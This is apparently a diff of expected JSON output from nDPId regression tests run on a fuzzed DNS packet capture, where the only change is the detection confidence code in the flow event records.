00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":234,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470058198,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1120470066200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470066200,"pkt":"ADBUADRWAODtMm69CABFAABEangAAIARTN3AqAECwKgBAQq9ADUAMAo6GsgAAAABAFmqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066200,"flow_last_seen":1120470066200,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470066200,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2749,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed 
Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1120470066201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470066201,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0AR+y1GsiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120470066203} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470066201,"pkt":"ADBUADRWAODtAW69KABFAAAhankAAIARGJPAqAEC1PIhIxPEE8QADcBLICAgICA="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1120470066293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470066293,"pkt":"ADBUADRWAODtAW69CABFAABIanoAAIARTNfAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1120470067291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470067291,"pkt":"ADBUADRWAODtAW69CABFAABIanwAAIARTNXAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1120470069294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470069294,"pkt":"ADBUADRWAODtAW69CABFAABIan0AAIARTNTAqAECwKgBASq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1120470071297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470071297,"pkt":"ADBUADREAODtAW69CABFAABIan4AAIAR7NPAqAECwKgBAQq+ADUANBBXP8gBqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470066293,"flow_last_seen":1120470071297,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470071297,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":244,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470075303,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.vo_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25202,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470066293,"flow_last_seen":1120470071297,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470071297,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":244,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470075303,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.vo_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25202,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1120470083305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470083305,"pkt":"ADBUADRWAODtAW69CABFAABEaoAAAIARTNXAqAESwKgBAQq\/ADUAMAo2GsoAAAABAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed 
Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1120470083306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470083306,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARt8vAqAEBwKgBAgA1Cr8AR+yxGsqAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAARoMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1120470083310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470083310,"pkt":"ADBUADRWAODtAW69CABFAABIaoIAAIARTM\/AqAECwKgBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
